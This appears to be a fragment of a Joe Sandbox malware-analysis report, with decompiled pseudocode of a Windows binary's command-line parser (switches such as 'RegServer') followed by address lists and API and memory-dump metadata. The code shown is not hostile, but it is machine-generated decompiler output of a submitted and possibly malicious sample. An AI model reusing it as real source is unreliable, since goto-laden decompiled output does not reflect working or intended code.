                                                                                                                                                                                                        															if(E000C667F(_t215, _t205) == 0) {
                                                                                                                                                                                                        																L115:
                                                                                                                                                                                                        																_t206 = 0x5d;
                                                                                                                                                                                                        																if(E000C667F(_t215, _t206) == 0) {
                                                                                                                                                                                                        																	L117:
                                                                                                                                                                                                        																	_t202 =  &_v276;
                                                                                                                                                                                                        																	_v276 = _t167;
                                                                                                                                                                                                        																	if(E000C5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t202 = 0x104;
                                                                                                                                                                                                        																		E000C1680(0xc8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t202 = 0x5b;
                                                                                                                                                                                                        																	if(E000C667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		goto L117;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t202 = 0x5d;
                                                                                                                                                                                                        																if(E000C667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L115;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *0xc8a24 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L50;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t100 = _t87 - 1;
                                                                                                                                                                                                        												if(_t100 == 0) {
                                                                                                                                                                                                        													L98:
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t38;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t101 =  *_t192;
                                                                                                                                                                                                        															_t192 = _t192 + 1;
                                                                                                                                                                                                        														} while (_t101 != 0);
                                                                                                                                                                                                        														if(_t192 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t202 =  &_v276;
                                                                                                                                                                                                        															_v276 = _t170;
                                                                                                                                                                                                        															if(E000C5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                        																_t218 = 0xc8b3e;
                                                                                                                                                                                                        																_t105 = _v276;
                                                                                                                                                                                                        																if(_t104 != 0x54) {
                                                                                                                                                                                                        																	_t218 = 0xc8a3a;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																E000C1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                        																_t202 = 0x104;
                                                                                                                                                                                                        																E000C658A(_t218, 0x104, 0xc1140);
                                                                                                                                                                                                        																if(E000C31E0(_t218) != 0) {
                                                                                                                                                                                                        																	goto L50;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L106;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t111 = _t100 - 0xa;
                                                                                                                                                                                                        													if(_t111 == 0) {
                                                                                                                                                                                                        														if(_v266 != 0) {
                                                                                                                                                                                                        															if(_v266 != 0x3a) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t199 = _v265;
                                                                                                                                                                                                        																if(_t199 != 0) {
                                                                                                                                                                                                        																	_t219 =  &_v265;
                                                                                                                                                                                                        																	do {
                                                                                                                                                                                                        																		_t219 = _t219 + 1;
                                                                                                                                                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                        																		if(_t115 == 0) {
                                                                                                                                                                                                        																			 *0xc8a2c = 1;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			_t200 = 2;
                                                                                                                                                                                                        																			_t119 = _t115 - _t200;
                                                                                                                                                                                                        																			if(_t119 == 0) {
                                                                                                                                                                                                        																				 *0xc8a30 = 1;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				if(_t119 == 0xf) {
                                                                                                                                                                                                        																					 *0xc8a34 = 1;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t209 = 0;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																		_t118 =  *_t219;
                                                                                                                                                                                                        																		_t199 = _t118;
                                                                                                                                                                                                        																	} while (_t118 != 0);
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															 *0xc8a2c = 1;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L50;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t127 = _t111 - 3;
                                                                                                                                                                                                        														if(_t127 == 0) {
                                                                                                                                                                                                        															if(_v266 != 0) {
                                                                                                                                                                                                        																if(_v266 != 0x3a) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                        																	if(_t129 == 0x31) {
                                                                                                                                                                                                        																		goto L76;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		if(_t129 == 0x41) {
                                                                                                                                                                                                        																			goto L83;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			if(_t129 == 0x55) {
                                                                                                                                                                                                        																				goto L76;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				goto L49;
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																L76:
                                                                                                                                                                                                        																_push(2);
                                                                                                                                                                                                        																_pop(1);
                                                                                                                                                                                                        																L83:
                                                                                                                                                                                                        																 *0xc8a38 = 1;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L50;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t132 = _t127 - 1;
                                                                                                                                                                                                        															if(_t132 == 0) {
                                                                                                                                                                                                        																if(_v266 != 0) {
                                                                                                                                                                                                        																	if(_v266 != 0x3a) {
                                                                                                                                                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                        																			goto L49;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t201 = _v265;
                                                                                                                                                                                                        																		 *0xc9a2c = 1;
                                                                                                                                                                                                        																		if(_t201 != 0) {
                                                                                                                                                                                                        																			_t220 =  &_v265;
                                                                                                                                                                                                        																			do {
                                                                                                                                                                                                        																				_t220 = _t220 + 1;
                                                                                                                                                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                        																				if(_t142 == 0) {
                                                                                                                                                                                                        																					_t143 = 2;
                                                                                                                                                                                                        																					 *0xc9a2c =  *0xc9a2c | _t143;
                                                                                                                                                                                                        																					goto L70;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t145 = _t142 - 3;
                                                                                                                                                                                                        																					if(_t145 == 0) {
                                                                                                                                                                                                        																						 *0xc8d48 =  *0xc8d48 | 0x00000040;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t146 = _t145 - 5;
                                                                                                                                                                                                        																						if(_t146 == 0) {
                                                                                                                                                                                                        																							 *0xc9a2c =  *0xc9a2c & 0xfffffffd;
                                                                                                                                                                                                        																							goto L70;
                                                                                                                                                                                                        																						} else {
                                                                                                                                                                                                        																							_t147 = _t146 - 5;
                                                                                                                                                                                                        																							if(_t147 == 0) {
                                                                                                                                                                                                        																								 *0xc9a2c =  *0xc9a2c & 0xfffffffe;
                                                                                                                                                                                                        																								goto L70;
                                                                                                                                                                                                        																							} else {
                                                                                                                                                                                                        																								_t149 = _t147;
                                                                                                                                                                                                        																								if(_t149 == 0) {
                                                                                                                                                                                                        																									 *0xc8d48 =  *0xc8d48 | 0x00000080;
                                                                                                                                                                                                        																								} else {
                                                                                                                                                                                                        																									if(_t149 == 3) {
                                                                                                                                                                                                        																										 *0xc9a2c =  *0xc9a2c | 0x00000004;
                                                                                                                                                                                                        																										L70:
                                                                                                                                                                                                        																										 *0xc8a28 = 1;
                                                                                                                                                                                                        																									} else {
                                                                                                                                                                                                        																										_t209 = 0;
                                                                                                                                                                                                        																									}
                                                                                                                                                                                                        																								}
                                                                                                                                                                                                        																							}
                                                                                                                                                                                                        																						}
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t144 =  *_t220;
                                                                                                                                                                                                        																				_t201 = _t144;
                                                                                                                                                                                                        																			} while (_t144 != 0);
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	 *0xc9a2c = 3;
                                                                                                                                                                                                        																	 *0xc8a28 = 1;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																goto L50;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																if(_t132 == 0) {
                                                                                                                                                                                                        																	goto L98;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	L49:
                                                                                                                                                                                                        																	_t209 = 0;
                                                                                                                                                                                                        																	L50:
                                                                                                                                                                                                        																	_t173 = _v272;
                                                                                                                                                                                                        																	if( *_t173 != 0) {
                                                                                                                                                                                                        																		goto L2;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		break;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L106;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										L34:
                                                                                                                                                                                                        										_t209 = 0;
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L131;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *0xc8a2c != 0 &&  *0xc8b3e == 0) {
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xc9a3c, 0xc8b3e, 0x104) == 0) {
                                                                                                                                                                                                        							_t209 = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t202 = 0x5c;
                                                                                                                                                                                                        							 *((char*)(E000C66C8(0xc8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = _t209;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L131:
                                                                                                                                                                                                        			}


































































                                                                                                                                                                                                        0x000c5c9e
                                                                                                                                                                                                        0x000c5ca9
                                                                                                                                                                                                        0x000c5cb0
                                                                                                                                                                                                        0x000c5cb3
                                                                                                                                                                                                        0x000c5cb6
                                                                                                                                                                                                        0x000c5cb7
                                                                                                                                                                                                        0x000c5cb8
                                                                                                                                                                                                        0x000c5cbd
                                                                                                                                                                                                        0x000c6204
                                                                                                                                                                                                        0x000c5ccb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5ccb
                                                                                                                                                                                                        0x000c5cd3
                                                                                                                                                                                                        0x000c5cd7
                                                                                                                                                                                                        0x000c5cf4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5cf4
                                                                                                                                                                                                        0x000c5cf8
                                                                                                                                                                                                        0x000c5d00
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5d06
                                                                                                                                                                                                        0x000c5d06
                                                                                                                                                                                                        0x000c5d0e
                                                                                                                                                                                                        0x000c5d10
                                                                                                                                                                                                        0x000c5d12
                                                                                                                                                                                                        0x000c5d14
                                                                                                                                                                                                        0x000c5d15
                                                                                                                                                                                                        0x000c5d17
                                                                                                                                                                                                        0x000c5d49
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5d19
                                                                                                                                                                                                        0x000c5d19
                                                                                                                                                                                                        0x000c5d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5d3f
                                                                                                                                                                                                        0x000c5d3f
                                                                                                                                                                                                        0x000c5d4b
                                                                                                                                                                                                        0x000c5d4b
                                                                                                                                                                                                        0x000c5d4f
                                                                                                                                                                                                        0x000c5d8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5d93
                                                                                                                                                                                                        0x000c5d93
                                                                                                                                                                                                        0x000c5d9a
                                                                                                                                                                                                        0x000c5d9d
                                                                                                                                                                                                        0x000c5d9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5d9e
                                                                                                                                                                                                        0x000c5d51
                                                                                                                                                                                                        0x000c5d5b
                                                                                                                                                                                                        0x000c5d72
                                                                                                                                                                                                        0x000c60fb
                                                                                                                                                                                                        0x000c60fb
                                                                                                                                                                                                        0x000c6207
                                                                                                                                                                                                        0x000c620a
                                                                                                                                                                                                        0x000c620b
                                                                                                                                                                                                        0x000c620e
                                                                                                                                                                                                        0x000c6217
                                                                                                                                                                                                        0x000c5d78
                                                                                                                                                                                                        0x000c5d78
                                                                                                                                                                                                        0x000c5d80
                                                                                                                                                                                                        0x000c5d83
                                                                                                                                                                                                        0x000c5d84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5d84
                                                                                                                                                                                                        0x000c5d5d
                                                                                                                                                                                                        0x000c5d5f
                                                                                                                                                                                                        0x000c5d62
                                                                                                                                                                                                        0x000c5d68
                                                                                                                                                                                                        0x000c5d64
                                                                                                                                                                                                        0x000c5d64
                                                                                                                                                                                                        0x000c5d64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5d62
                                                                                                                                                                                                        0x000c5d5b
                                                                                                                                                                                                        0x000c5d4f
                                                                                                                                                                                                        0x000c5d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5d9f
                                                                                                                                                                                                        0x000c5d9f
                                                                                                                                                                                                        0x000c5da5
                                                                                                                                                                                                        0x000c5dab
                                                                                                                                                                                                        0x000c5dba
                                                                                                                                                                                                        0x000c6218
                                                                                                                                                                                                        0x000c621d
                                                                                                                                                                                                        0x000c6220
                                                                                                                                                                                                        0x000c6221
                                                                                                                                                                                                        0x000c6229
                                                                                                                                                                                                        0x000c6230
                                                                                                                                                                                                        0x000c6247
                                                                                                                                                                                                        0x000c626a
                                                                                                                                                                                                        0x000c6272
                                                                                                                                                                                                        0x000c6249
                                                                                                                                                                                                        0x000c6255
                                                                                                                                                                                                        0x000c625f
                                                                                                                                                                                                        0x000c6264
                                                                                                                                                                                                        0x000c6264
                                                                                                                                                                                                        0x000c6284
                                                                                                                                                                                                        0x000c5dc0
                                                                                                                                                                                                        0x000c5dc0
                                                                                                                                                                                                        0x000c5dca
                                                                                                                                                                                                        0x000c5e22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5dcc
                                                                                                                                                                                                        0x000c5dce
                                                                                                                                                                                                        0x000c5e24
                                                                                                                                                                                                        0x000c5e24
                                                                                                                                                                                                        0x000c5e2c
                                                                                                                                                                                                        0x000c5e47
                                                                                                                                                                                                        0x000c5e4a
                                                                                                                                                                                                        0x000c61d2
                                                                                                                                                                                                        0x000c61e2
                                                                                                                                                                                                        0x000c61e7
                                                                                                                                                                                                        0x000c61ee
                                                                                                                                                                                                        0x000c61f1
                                                                                                                                                                                                        0x000c61f1
                                                                                                                                                                                                        0x000c61f8
                                                                                                                                                                                                        0x000c61f8
                                                                                                                                                                                                        0x000c5e50
                                                                                                                                                                                                        0x000c5e53
                                                                                                                                                                                                        0x000c6109
                                                                                                                                                                                                        0x000c611f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6125
                                                                                                                                                                                                        0x000c6137
                                                                                                                                                                                                        0x000c613a
                                                                                                                                                                                                        0x000c613c
                                                                                                                                                                                                        0x000c613e
                                                                                                                                                                                                        0x000c613e
                                                                                                                                                                                                        0x000c6141
                                                                                                                                                                                                        0x000c6141
                                                                                                                                                                                                        0x000c6143
                                                                                                                                                                                                        0x000c6144
                                                                                                                                                                                                        0x000c614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6150
                                                                                                                                                                                                        0x000c6152
                                                                                                                                                                                                        0x000c615c
                                                                                                                                                                                                        0x000c6170
                                                                                                                                                                                                        0x000c6172
                                                                                                                                                                                                        0x000c617c
                                                                                                                                                                                                        0x000c6190
                                                                                                                                                                                                        0x000c6190
                                                                                                                                                                                                        0x000c6196
                                                                                                                                                                                                        0x000c61a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c61ab
                                                                                                                                                                                                        0x000c61b9
                                                                                                                                                                                                        0x000c61c6
                                                                                                                                                                                                        0x000c61c6
                                                                                                                                                                                                        0x000c617e
                                                                                                                                                                                                        0x000c6180
                                                                                                                                                                                                        0x000c618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c618a
                                                                                                                                                                                                        0x000c615e
                                                                                                                                                                                                        0x000c6160
                                                                                                                                                                                                        0x000c616a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c616a
                                                                                                                                                                                                        0x000c615c
                                                                                                                                                                                                        0x000c614a
                                                                                                                                                                                                        0x000c610b
                                                                                                                                                                                                        0x000c610e
                                                                                                                                                                                                        0x000c610e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5e59
                                                                                                                                                                                                        0x000c5e59
                                                                                                                                                                                                        0x000c5e5c
                                                                                                                                                                                                        0x000c604f
                                                                                                                                                                                                        0x000c6056
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c605c
                                                                                                                                                                                                        0x000c606e
                                                                                                                                                                                                        0x000c6071
                                                                                                                                                                                                        0x000c6073
                                                                                                                                                                                                        0x000c6075
                                                                                                                                                                                                        0x000c6075
                                                                                                                                                                                                        0x000c6078
                                                                                                                                                                                                        0x000c6078
                                                                                                                                                                                                        0x000c607a
                                                                                                                                                                                                        0x000c607b
                                                                                                                                                                                                        0x000c6081
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6087
                                                                                                                                                                                                        0x000c6087
                                                                                                                                                                                                        0x000c608d
                                                                                                                                                                                                        0x000c609c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c60a2
                                                                                                                                                                                                        0x000c60aa
                                                                                                                                                                                                        0x000c60b2
                                                                                                                                                                                                        0x000c60b7
                                                                                                                                                                                                        0x000c60bd
                                                                                                                                                                                                        0x000c60bf
                                                                                                                                                                                                        0x000c60bf
                                                                                                                                                                                                        0x000c60d6
                                                                                                                                                                                                        0x000c60e0
                                                                                                                                                                                                        0x000c60e7
                                                                                                                                                                                                        0x000c60f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c60f5
                                                                                                                                                                                                        0x000c609c
                                                                                                                                                                                                        0x000c6081
                                                                                                                                                                                                        0x000c5e62
                                                                                                                                                                                                        0x000c5e62
                                                                                                                                                                                                        0x000c5e65
                                                                                                                                                                                                        0x000c5fd3
                                                                                                                                                                                                        0x000c5fe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5fef
                                                                                                                                                                                                        0x000c5fef
                                                                                                                                                                                                        0x000c5ff7
                                                                                                                                                                                                        0x000c5ffd
                                                                                                                                                                                                        0x000c6003
                                                                                                                                                                                                        0x000c6006
                                                                                                                                                                                                        0x000c6011
                                                                                                                                                                                                        0x000c6014
                                                                                                                                                                                                        0x000c603d
                                                                                                                                                                                                        0x000c6016
                                                                                                                                                                                                        0x000c6018
                                                                                                                                                                                                        0x000c6019
                                                                                                                                                                                                        0x000c601b
                                                                                                                                                                                                        0x000c6033
                                                                                                                                                                                                        0x000c601d
                                                                                                                                                                                                        0x000c6020
                                                                                                                                                                                                        0x000c6029
                                                                                                                                                                                                        0x000c6022
                                                                                                                                                                                                        0x000c6022
                                                                                                                                                                                                        0x000c6022
                                                                                                                                                                                                        0x000c6020
                                                                                                                                                                                                        0x000c601b
                                                                                                                                                                                                        0x000c6042
                                                                                                                                                                                                        0x000c6044
                                                                                                                                                                                                        0x000c6046
                                                                                                                                                                                                        0x000c604a
                                                                                                                                                                                                        0x000c5ff7
                                                                                                                                                                                                        0x000c5fd5
                                                                                                                                                                                                        0x000c5fd8
                                                                                                                                                                                                        0x000c5fd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5e6b
                                                                                                                                                                                                        0x000c5e6b
                                                                                                                                                                                                        0x000c5e6e
                                                                                                                                                                                                        0x000c5f8b
                                                                                                                                                                                                        0x000c5f99
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5f9f
                                                                                                                                                                                                        0x000c5fa7
                                                                                                                                                                                                        0x000c5faf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5fb1
                                                                                                                                                                                                        0x000c5fb3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5fb5
                                                                                                                                                                                                        0x000c5fb7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5fb9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5fb9
                                                                                                                                                                                                        0x000c5fb7
                                                                                                                                                                                                        0x000c5fb3
                                                                                                                                                                                                        0x000c5faf
                                                                                                                                                                                                        0x000c5f8d
                                                                                                                                                                                                        0x000c5f8d
                                                                                                                                                                                                        0x000c5f8d
                                                                                                                                                                                                        0x000c5f8f
                                                                                                                                                                                                        0x000c5fc1
                                                                                                                                                                                                        0x000c5fc1
                                                                                                                                                                                                        0x000c5fc1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5e74
                                                                                                                                                                                                        0x000c5e74
                                                                                                                                                                                                        0x000c5e77
                                                                                                                                                                                                        0x000c5ea0
                                                                                                                                                                                                        0x000c5ebd
                                                                                                                                                                                                        0x000c5f79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5f7f
                                                                                                                                                                                                        0x000c5ec3
                                                                                                                                                                                                        0x000c5ec3
                                                                                                                                                                                                        0x000c5ecc
                                                                                                                                                                                                        0x000c5ed4
                                                                                                                                                                                                        0x000c5ed6
                                                                                                                                                                                                        0x000c5edc
                                                                                                                                                                                                        0x000c5edf
                                                                                                                                                                                                        0x000c5eea
                                                                                                                                                                                                        0x000c5eed
                                                                                                                                                                                                        0x000c5f3f
                                                                                                                                                                                                        0x000c5f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5eef
                                                                                                                                                                                                        0x000c5eef
                                                                                                                                                                                                        0x000c5ef2
                                                                                                                                                                                                        0x000c5f34
                                                                                                                                                                                                        0x000c5ef4
                                                                                                                                                                                                        0x000c5ef4
                                                                                                                                                                                                        0x000c5ef7
                                                                                                                                                                                                        0x000c5f2b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5ef9
                                                                                                                                                                                                        0x000c5ef9
                                                                                                                                                                                                        0x000c5efc
                                                                                                                                                                                                        0x000c5f22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5efe
                                                                                                                                                                                                        0x000c5eff
                                                                                                                                                                                                        0x000c5f02
                                                                                                                                                                                                        0x000c5f16
                                                                                                                                                                                                        0x000c5f04
                                                                                                                                                                                                        0x000c5f07
                                                                                                                                                                                                        0x000c5f0d
                                                                                                                                                                                                        0x000c5f46
                                                                                                                                                                                                        0x000c5f46
                                                                                                                                                                                                        0x000c5f09
                                                                                                                                                                                                        0x000c5f09
                                                                                                                                                                                                        0x000c5f09
                                                                                                                                                                                                        0x000c5f07
                                                                                                                                                                                                        0x000c5f02
                                                                                                                                                                                                        0x000c5efc
                                                                                                                                                                                                        0x000c5ef7
                                                                                                                                                                                                        0x000c5ef2
                                                                                                                                                                                                        0x000c5f4c
                                                                                                                                                                                                        0x000c5f4e
                                                                                                                                                                                                        0x000c5f50
                                                                                                                                                                                                        0x000c5f54
                                                                                                                                                                                                        0x000c5ed4
                                                                                                                                                                                                        0x000c5ea2
                                                                                                                                                                                                        0x000c5ea4
                                                                                                                                                                                                        0x000c5eaf
                                                                                                                                                                                                        0x000c5eaf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5e79
                                                                                                                                                                                                        0x000c5e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5e83
                                                                                                                                                                                                        0x000c5e83
                                                                                                                                                                                                        0x000c5e83
                                                                                                                                                                                                        0x000c5e85
                                                                                                                                                                                                        0x000c5e85
                                                                                                                                                                                                        0x000c5e8e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5e94
                                                                                                                                                                                                        0x000c5e8e
                                                                                                                                                                                                        0x000c5e7d
                                                                                                                                                                                                        0x000c5e77
                                                                                                                                                                                                        0x000c5e6e
                                                                                                                                                                                                        0x000c5e65
                                                                                                                                                                                                        0x000c5e5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5dd0
                                                                                                                                                                                                        0x000c5dd0
                                                                                                                                                                                                        0x000c5dd0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5dd0
                                                                                                                                                                                                        0x000c5dce
                                                                                                                                                                                                        0x000c5dca
                                                                                                                                                                                                        0x000c5dba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5d00
                                                                                                                                                                                                        0x000c5dd9
                                                                                                                                                                                                        0x000c5e04
                                                                                                                                                                                                        0x000c61fe
                                                                                                                                                                                                        0x000c5e0a
                                                                                                                                                                                                        0x000c5e0c
                                                                                                                                                                                                        0x000c5e17
                                                                                                                                                                                                        0x000c5e17
                                                                                                                                                                                                        0x000c5e04
                                                                                                                                                                                                        0x000c6200
                                                                                                                                                                                                        0x000c6200
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 000C5CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(000C8B3E,00000104,00000000,?,?), ref: 000C5DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 000C5E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 000C5EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 000C5F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 000C5FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 000C6008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 000C60AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,000C1140,00000000,00000040,00000000), ref: 000C61F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 000C61F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
